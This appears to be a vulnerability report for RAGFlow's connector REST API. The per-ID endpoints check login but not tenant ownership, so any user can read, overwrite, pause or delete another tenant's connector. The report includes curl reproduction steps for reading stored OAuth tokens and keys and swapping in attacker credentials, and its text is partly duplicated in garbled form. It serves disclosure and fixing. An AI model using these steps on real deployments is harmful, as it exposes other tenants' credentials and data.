Self Checks
RAGFlow workspace code commit ID
048ec2f
RAGFlow image version
infiniflow/ragflow:v0.25.2 / nightly
Other environment information
- Component: Python REST API – data-source connectors
- Affected file: api/apps/restful_apis/connector_api.py
- Affected service: api/db/services/connector_service.py (uses CommonService.get_by_id / update_by_id / delete_by_id)
- Affected endpoints (all only protected by @login_required, no tenant check):
- GET /v1/connectors/<connector_id>
- PATCH /v1/connectors/<connector_id>
- DELETE /v1/connectors/<connector_id>
- POST /v1/connectors/<connector_id>/resume
- GET /v1/connectors/<connector_id>/logs
- Browser: N/A (API)
- OS: N/A
Actual behavior
Any authenticated user can read, modify, pause/resume, list sync logs of, or delete any other tenant's Connector simply by guessing or learning its 32-char connector_id. The handlers fetch and mutate the row using ConnectorService.get_by_id(connector_id) / update_by_id(connector_id, ...) / delete_by_id(connector_id), which only filter by id and never compare the row's tenant_id against the caller (current_user.id / their joined tenants).
This includes the connector config JSON, which holds the credentials used to ingest from external data sources — Google Drive / Gmail OAuth refresh tokens, Box client secret + refresh token, S3 access keys, Confluence / Jira / Notion / Slack tokens, etc. So an attacker can:
- Read another tenant's data-source credentials in clear (cross-tenant secret disclosure).
- Replace another tenant's
config (e.g. swap redirect_uri/credentials) and have the next sync push that tenant's data into an attacker-owned source — or simply break their ingestion.
- Delete another tenant's connector, breaking their ingestion pipelines.
- Pause or force-reschedule another tenant's connector.
- Read another tenant's sync logs, including
error_msg and full_exception_trace, which routinely leak file paths, document IDs, kb_ids, and stack traces from the other tenant's environment.
Expected behavior
Each connector endpoint should verify that connector.tenant_id is owned (or team-shared) by current_user, using the same pattern already enforced by sibling endpoints (e.g. KnowledgebaseService.accessible(...) in chunk_api.py, or the tenant + team check applied in file_api_service.py after #14725). On failure it should return RetCode.AUTHENTICATION_ERROR (403) and not reveal whether the connector exists.
The "list connectors" endpoint already does the right thing (ConnectorService.list(current_user.id) filters by tenant_id) — the same scoping just needs to be applied to the per-id endpoints.
Steps to reproduce
1.
As tenant A, create a connector (e.g. Google Drive) so it has secrets in config:
POST /v1/connectors
{
"name": "victim-drive",
"source": "google-drive",
"config": {"refresh_token": "1//A-secret", "client_id": "...", "client_secret": "..."},
"refresh_freq": 5
}
-> 200 OK; note the returned `id` = <CONN_ID>.
2.
Sign out, sign in as tenant B (a completely separate account / org).
3.
Read the victim's full config (including secrets):
curl -H "Authorization: Bearer <USER_B_TOKEN>" \
http://<host>/v1/connectors/<CONN_ID>
Expected: 403 / "No authorization."
Actual: 200 OK with tenant A's connector row, including `config` -> refresh_token / client_secret.
4.
Overwrite the victim's config and schedule:
curl -X PATCH -H "Authorization: Bearer <USER_B_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"config": {"refresh_token": "ATTACKER_TOKEN", ...}, "refresh_freq": 1}' \
http://<host>/v1/connectors/<CONN_ID>
Expected: 403.
Actual: 200 OK; tenant A's connector now points at attacker-controlled credentials.
5.
Read tenant A's sync logs (error traces, kb_ids, doc names):
curl -H "Authorization: Bearer <USER_B_TOKEN>" \
"http://<host>/v1/connectors/<CONN_ID>/logs?page=1&page_size=50"
Expected: 403.
Actual: 200 OK with logs including `error_msg`, `full_exception_trace`, `kb_id`, `tenant_id`.
6.
Pause/cancel the victim's sync:
curl -X POST -H "Authorization: Bearer <USER_B_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"resume": false}' \
http://<host>/v1/connectors/<CONN_ID>/resume
-> 200 OK.
7.
Delete the victim's connector entirely:
curl -X DELETE -H "Authorization: Bearer <USER_B_TOKEN>" \
http://<host>/v1/connectors/<CONN_ID>
-> 200 OK; row removed.
Additional information
No response
Self Checks
RAGFlow workspace code commit ID
048ec2f
RAGFlow image version
infiniflow/ragflow:v0.25.2 / nightly
Other environment information
Actual behavior
Any authenticated user can read, modify, pause/resume, list sync logs of, or delete any other tenant's
Connectorsimply by guessing or learning its 32-charconnector_id. The handlers fetch and mutate the row usingConnectorService.get_by_id(connector_id)/update_by_id(connector_id, ...)/delete_by_id(connector_id), which only filter byidand never compare the row'stenant_idagainst the caller (current_user.id/ their joined tenants).This includes the connector
configJSON, which holds the credentials used to ingest from external data sources — Google Drive / Gmail OAuth refresh tokens, Box client secret + refresh token, S3 access keys, Confluence / Jira / Notion / Slack tokens, etc. So an attacker can:config(e.g. swapredirect_uri/credentials) and have the next sync push that tenant's data into an attacker-owned source — or simply break their ingestion.error_msgandfull_exception_trace, which routinely leak file paths, document IDs, kb_ids, and stack traces from the other tenant's environment.Expected behavior
Each connector endpoint should verify that
connector.tenant_idis owned (or team-shared) bycurrent_user, using the same pattern already enforced by sibling endpoints (e.g.KnowledgebaseService.accessible(...)inchunk_api.py, or the tenant + team check applied infile_api_service.pyafter #14725). On failure it should returnRetCode.AUTHENTICATION_ERROR(403) and not reveal whether the connector exists.The "list connectors" endpoint already does the right thing (
ConnectorService.list(current_user.id)filters by tenant_id) — the same scoping just needs to be applied to the per-id endpoints.Steps to reproduce
Additional information
No response